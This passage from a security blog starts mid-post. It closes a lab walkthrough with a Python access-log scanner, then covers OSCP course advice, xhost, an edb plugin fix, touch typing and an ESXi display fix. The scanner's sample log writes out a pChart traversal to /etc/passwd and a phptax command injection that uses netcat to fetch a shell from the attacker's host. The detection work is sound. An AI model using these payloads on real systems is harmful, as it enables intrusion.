600 seconds. I was nice enough to remove that part 🙂

—————————————————————————

This means our attacks would more than likely have been halted, or at least delayed.
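Both the pChart traversal and the phptax command injection used in this walkthrough leave distinctive requests in the httpd access log, which is what OSSEC-HIDS keys its “web attack” rules on. As an added example (not code from the walkthrough, from OSSEC or from the VM), the following Python decodes the query string of each logged request, repeatedly so that double encoding does not hide the payload, and flags ../ sequences and shell metacharacters. The sample log lines are constructed from the URLs shown above; the timestamps and response sizes are made up.

```python
import re
from typing import List
from urllib.parse import unquote

# Apache common/combined log line prefix: client, identd, user, [timestamp], "request", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" (?P<status>\d{3})')

# "../" anywhere in a decoded value (also catches a leading ../ and a trailing /..)
TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")
# shell metacharacters that have no business in a file-name parameter
SHELL_META = re.compile(r"[;|`<>]|\$\(")


def decode_fully(value: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly so double encoding (%252e) does not hide a payload."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyse_request(target: str) -> List[str]:
    """Return the reasons a request target looks like traversal or command injection."""
    findings = []
    path, _, query = target.partition("?")
    if TRAVERSAL.search(decode_fully(path)):
        findings.append("path traversal in URL path")
    if query:
        # split on '&' only: a ';' inside a value is a shell separator, not a query one
        for pair in query.split("&"):
            name, _, value = pair.partition("=")
            value = decode_fully(value)
            if TRAVERSAL.search(value):
                findings.append(f"path traversal in parameter {name}")
            if SHELL_META.search(value):
                findings.append(f"shell metacharacter in parameter {name}")
    return findings


def scan_log(lines: List[str]) -> List[dict]:
    """Parse each access-log line and keep the ones with findings."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue            # not an access-log line we understand; skip it
        findings = analyse_request(m.group("target"))
        if findings:
            hits.append({"ip": m.group("ip"), "target": m.group("target"),
                         "status": int(m.group("status")), "findings": findings})
    return hits


# Constructed sample log: the pChart traversal and phptax injection URLs from the
# walkthrough above, plus a benign request (timestamps and sizes are made up)
SAMPLE_ACCESS_LOG = [
    '192.168.56.1 - - [17/Dec/2017:15:55:00 +0000] "GET /index.html HTTP/1.1" 200 44',
    '192.168.56.1 - - [17/Dec/2017:16:02:11 +0000] "GET /pChart2.1.3/examples/index.php'
    '?Action=View&Script=%2f..%2f..%2fetc/passwd HTTP/1.1" 200 1847',
    '192.168.56.1 - - [17/Dec/2017:16:10:42 +0000] "GET /phptax/index.php?pfilez=1040d1-pg2.tob'
    ';nc%20-nv%20192.168.56.1%201337%20%3E%3E%20shell2.php%20;&pdf=make HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_ACCESS_LOG):
        print(hit["ip"], hit["target"], hit["findings"])
```

Note that a 200 status is no comfort here: both malicious requests in the sample succeeded, which is why content-based rules like these, rather than error-rate monitoring, are what catch this class of attack in the log.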

Conclusion / Lessons learned?

It was fun exploiting this box; after finishing it via the Metasploit method I had fun finding other ways in. There was some trial and error with the netcat transfers (which end needed to be the server and which the client). I learned quite a bit more about FreeBSD Unix; my normal day-to-day operating systems are Linux or Windows, so it was fun playing once I was root.

Interestingly having gcc installed on the server and netcat were instrumental in exploiting this server. Without netcat you could use TFTP or FTP to transfer files, if the client tools were there. Lesson: Don’t make things easy for an attacker.

I hope you learned something from this walk-through; I certainly had fun and even picked up some new knowledge. I would encourage anyone to replicate what I have done and try out all the methods I have documented. You may even find more methods; feel free to comment below and let me know.

Have fun.

 

References

Offensive Security Exploit db – https://www.exploit-db.com/
Vulnhub.com – https://www.vulnhub.com/
Searchsploit – Kali Linux. https://www.kali.org/
Kioptrix website – https://www.kioptrix.com/blog/

Running X Apps for another user.

Issue:

You are logged into your desktop but need to run another X Windows process as a different user, e.g. Hexchat whilst logged in as root (mostly Kali related).

Hexchat and potentially other applications may pop up a helpful prompt letting you know not to run things as root as it is a ‘Bad Thing™’

[image: hexchat-error]

Glorious message isn’t it!

The problem is that the other user does not have permission to open windows on the current display. X checks the Xauthority file (and the xhost access list) to decide whether that user may spawn a process on the current display.

Solutions:

In a terminal type the following:


xhost + SI:localuser:muh
gksudo -u muh hexchat #Or su - muh -c hexchat

xhost is a command that grants hosts or users access to your X environment so they can run apps in the session. SI means Server Interpreted, and localuser:muh names the local user muh, so the form is SI:localuser:<username>. Note: this lasts only for the duration of your X session, so rebooting would remove it.

gksudo is much like sudo but for X; the -u switch gives the user (muh in this instance). This should start Hexchat or whichever application you need. If you are not root you will be prompted for the user’s password. And that’s it.

Update April 7th 2019 : Add export DISPLAY=:0.0 into ~/.bashrc for the user you want to run the application as.

Hope this was useful for someone out there.

GRL.

OSCP – Experiences and Advice.

Certification name: Offensive Security Certified Professional:
Penetration testing with Kali Linux. (PWK)

Intro:

If you’ve reached this page you may be gathering information on whether to do this certification or another one, say maybe the CEH?
What follows is my experience when I took and passed what I think is an excellent course and exam, then some tips for preparing so you can get the most out of it.
The course itself is well worth the pain it happily puts you through. Did I mention the anguish? Well, you will get plenty of both, but once you get past all that, the rewards make it well worth it.

Course details

The course itself is available in 30, 60 or 90 days, with the option to purchase more lab time along with an exam attempt. You get the course material and then the chosen amount of time in the labs you bought with it. Firstly you will need to download the recommended virtual machine image that has all the tools necessary for you to successfully complete the course (links in the course material), as well as a hypervisor to run it (either VirtualBox, VMware Workstation or the free VMware Player). You work through the material, do the exercises and test what you have learned in the labs so you become familiar with the tools and methodology.
The labs themselves are essentially a number of networks you access via VPN that you can freely scan and attack to your heart’s content. There are a few restrictions, such as no ARP spoofing or DNS attacks: anything that could potentially disrupt other students, as you do share the labs. There are a number of identical lab networks that students get assigned to, so you do not have to worry about congestion or clashing with other students attacking the same box. In fact some popular boxes are duplicated within the environment. This reduces the likelihood of students clashing (it can happen, but it is greatly reduced). Students are also encouraged to do a couple of checks before they attack a target: if it has been reverted (reset) recently there is a good chance another student is currently playing with it.
But don’t worry, there are over 50 machines across 3 networks in the labs, so you will not be short of machines to try and break into.
The main purpose of the labs is to bestow experience on you; each machine has a different way to be attacked. Although you could potentially use the same exploit on similar machines, you would not gain or learn anything from it. It is generally recommended that you do most if not all of the labs before you go for your exam, but this is just a suggestion. I know of some people who had only done a small handful of lab machines and passed their exam fine, but this is purely down to the individual (one or two of them may even already be pentesters, so already have good experience).

Course experiences.

Coming from a sysadmin background, the course taught me not to be afraid of breaking or changing things and trying things out. That was difficult for me to learn, as I was so used to fixing things and keeping services up and running.
The material was mostly new to me. I have Linux and Windows experience and some scripting skills, so those parts were easily assimilated, but other sections such as buffer overflows and understanding registers were all new, as was the small amount of Python.
At times I felt like I was in over my head, and, as intended, you need to do a lot of external research to get a full grasp of all the exercises. This is all part of the course: read one section, then spend the next 3 hours reading other resources until you are happy with what you have learned.

How long will it take to pass?

Everyone is different; it will depend on how much time per week you can devote to this course. If you can get 5 hours a day you should be able to get through everything within 2 weeks easily, but if, like me, you have work, life, food and sleep getting in the way, it will take longer. Please do not get hung up on how fast you need to pick this stuff up. I started in March and passed at the beginning of November on my 2nd attempt. I did have a full 2 weeks off work to do labs and found this invaluable, but that depends on how flexible your workplace is.

The course aims to empower students to learn for themselves: try things out, fail a lot, but always learn from the failures. The course motto isn’t ‘Try harder’ for nothing! Spoilers are discouraged by admins and other students; where’s the fun in being told the answers when you need to learn yourself?

One of my issues with this course was that you get your course material at the same time as your lab time starts, so you are conscious of the time you are taking: your lab time is counting down. You may race through the material just to get into the labs sooner, before your time runs out.

My advice: book the 30 day session first, then buy more once you need it. That way, if something happens (as life always does), you do not have lab time wasting away.

Student support and resources:

IRC Chat

IRC on the freenode network, channel #offsec: a place where you can talk to other students.

Forums:
These contain a vast array of knowledge and are a place to ask questions and read a little more about the machines in the labs. Admins are very good at trimming off any potential spoilers, as you will not learn anything by being told how to break into a particular box.
Live chat with admins:
If you get truly stuck you can chat to an admin who will ask what you have done and guide you without giving too much away. It may be as simple as ‘You are heading in the right direction, keep going.’

Recommendations:

Preparation before the course:
This is an excellent guide to preparing for the course. It’s well written and will benefit anyone looking to participate in all the fun 😉 I followed this guide a little late, but did use it as a supplement to my learning.
Hindsight: do the prep first, before the course. You will benefit greatly.
Useful things to also learn:
  1. Bash scripting (nothing serious, just some loops, output redirection and pipes, plus common tools for string manipulation such as sed, grep, cat, cut etc.)
  2. Python to a very basic level (just enough for developing and changing exploits)
  3. Basic Linux administration (moving around the filesystem, day to day administration)
  4. Basic Windows administration
Once you’ve done the above, why not have a play with some vulnerable machines and dip your toe in.
OSCP-like virtual machines from Vulnhub.
You can do these either before or after your course; I know some people who do these machines as a supplement after their labs finish. Good for practice.
I am running through these now to gain more practice and experience, and I shall also be getting more lab time despite having passed the course. I did not finish all the machines, so I am eager to gain more from them. The labs are that good.

So to summarise….

  1. Do the prep first (read the book, watch the videos)
  2. Book your course and lab length
  3. Do at least 30-40 machines in the labs
  4. Re-grow hair.
  5. Book exam
  6. Pass your exam.
  7. Have some tea.
That’s it. I hope you enjoyed reading this as much as I enjoyed writing it.
Have fun.
GRL

edb Failed to load missing core debugger plugins

I hit an issue starting the Linux debugger edb when trying a buffer overflow exercise in Kali a little while after I updated it. It has been a while since I did an exercise of this nature, so I am not sure how long this has been broken.

EDB will not run and just displays a blank screen with the message shown below.

edb_error1

I managed to fix this after doing a search of the file system to locate the relevant plugins/libs (locate edb | grep libDebuggerCore.so).

Solution: Options > Preferences > Plugin Directories

In my case this value should have read /usr/lib/x86_64-linux-gnu/edb, or whatever the above command found; not every system is the same.

Update and close, then restart edb.

There was a bug report about this dated Feb 2017 (Github Bug edb). New packages were installed, but the user preferences in your home directory (.config/codef00.com/edb.conf) may still hold the old reference and not work despite the package version being correct. The fix above updates this file.
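The locate step above depends on an up-to-date locate database, which is often exactly what is stale right after a package update. As an added example (not code from the post or from the edb project), this script finds the directory that actually contains libDebuggerCore.so with find, and checks whether ~/.config/codef00.com/edb.conf already mentions that path. The key name edb uses inside edb.conf is not shown in the post, so the check greps for the path value rather than assuming a key.

```shell
#!/bin/sh
# Added example (not from the original post): find where the edb core
# debugger plugin actually lives and compare with what the user's edb.conf
# records. Uses find instead of locate so it works even when the locate
# database is stale after a package update.

# Print the directory containing libDebuggerCore.so below the given roots
# (default: /usr/lib and /usr/local/lib). Returns 1 if nothing is found.
find_edb_plugin_dir() {
    roots="$*"
    [ -n "$roots" ] || roots="/usr/lib /usr/local/lib"
    # word splitting of $roots is intended: one path per root
    hit=$(find $roots -name libDebuggerCore.so 2>/dev/null | head -n 1)
    [ -n "$hit" ] || return 1
    dirname "$hit"
}

# Return 0 if the config file already names the given directory.
# The exact preference key is not known from the post, so match on the
# path value itself (-F: fixed string, no regex surprises from slashes).
config_mentions_dir() {
    conf="$1"; dir="$2"
    [ -r "$conf" ] || return 1
    grep -q -F -- "$dir" "$conf"
}

# Report what to set under Options > Preferences > Plugin Directories.
# Usage: ./check_edb_plugins.sh [root ...]
report() {
    conf="${HOME}/.config/codef00.com/edb.conf"
    if dir=$(find_edb_plugin_dir "$@"); then
        if config_mentions_dir "$conf" "$dir"; then
            printf 'edb.conf already points at %s\n' "$dir"
        else
            printf 'set Plugin Directories to: %s\n' "$dir"
        fi
    else
        printf 'libDebuggerCore.so not found; is the edb package installed?\n' >&2
        return 1
    fi
}

if [ -n "${EDB_CHECK_RUN:-}" ]; then
    report "$@"
fi
```

Run it with EDB_CHECK_RUN=1 set; the value it prints is what goes into the Plugin Directories preference, after which edb.conf should mention that path.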

Hope this helps someone.

Relearning old skills

gtypist3

Over the years I’ve been happily typing away ad hoc, sometimes one key pecked at a time, sometimes getting a series of keys rolling and getting that satisfying few words in quick succession. Typing for me is one of my slowest and most frustrating ways to get what I am thinking into written form. Writing was just as bad: when in a hurry my handwriting deteriorated into a mess.

Gradually over time my typing got faster, but I was always looking at my hands, making sure I hit the right key as quickly as possible, only to look up and see that I had made a mistake 3 words back, which I then frustratingly had to scroll back and correct, then carry on where I left off, only to do it again the next time I looked up, rinsing and repeating until I was done. Sure, your hands learn to fire off some words completely from what is referred to as muscle memory, but inevitably you fall right back into the method you have trained yourself to use.

Sound familiar?

I had promised myself I would learn to touch type eventually, but it would get forgotten or something else would come up which was far more important (literally anything really!).

Well, holiday time finally rolled round, and I decided enough was enough: I would dig out an old typing program I had looked at briefly when I first started to play with Linux. It is called GNU Typist. It’s far from elegant and has no games to play with, but it has the basics, and the basics it does very well. Luckily for me, being on a Windows laptop, there is a version available.

In all its glory.

GNU Typist at its most basic.

I opted for the quick lessons in the series; they are nice bite-sized lessons to do over 5 days (as there were 5 lessons). The program tells you which fingers to use and where. The key, I think, is to stick with it and do the lessons on a regular basis; this is needed to retrain your fingers to go to the correct keys in the correct order. You will be much slower than your normal typing method, and you may catch yourself reverting back, but do persist. Eventually your speed will increase and you will reap the benefits. (This actually happens a lot quicker than you would think.)

And in case you are wondering, this entire post was typed using proper technique, with fewer mistakes, and I especially liked the fact that I could look elsewhere and just let my fingers do the talking (as it were).

Speed-wise I am averaging a magnificently slow pace of 25 wpm, but I am getting quicker the more I type. Practice definitely pays off.

Right then, thanks for reading, links below.

GNU Typist website
https://www.gnu.org/software/gtypist/index.html

Or install it via apt-get or yum install (gtypist); it’s available in most repositories of your favourite distributions.

Kali / Linux ESXi Resolution resize issue.

Issue: Changing the desktop resolution on Linux, or in my case Kali, has issues in ESXi. It either fails, goes blank or displays a corrupted image until it reverts back to 800×600.

I stumbled upon this with a new installation in a testing network I was playing with; despite installing VMware Tools on the client and updating them numerous times, I could not get the desktop to a more usable resolution than 800×600. Was it drivers for the video card or the monitor? After 30 minutes of googling I found a solution in the Kali forums (thanks to SpeedyQuick).

Solution:

Increase video card memory in vSphere Client to 32MB from the default of 4MB. Then you should be able to resize to your desired resolution.

vmware_display_mem

I’d imagine that if you were having similar issues with VirtualBox this solution would also apply, though VirtualBox seems to default to a higher amount, so I have not seen this issue there yet.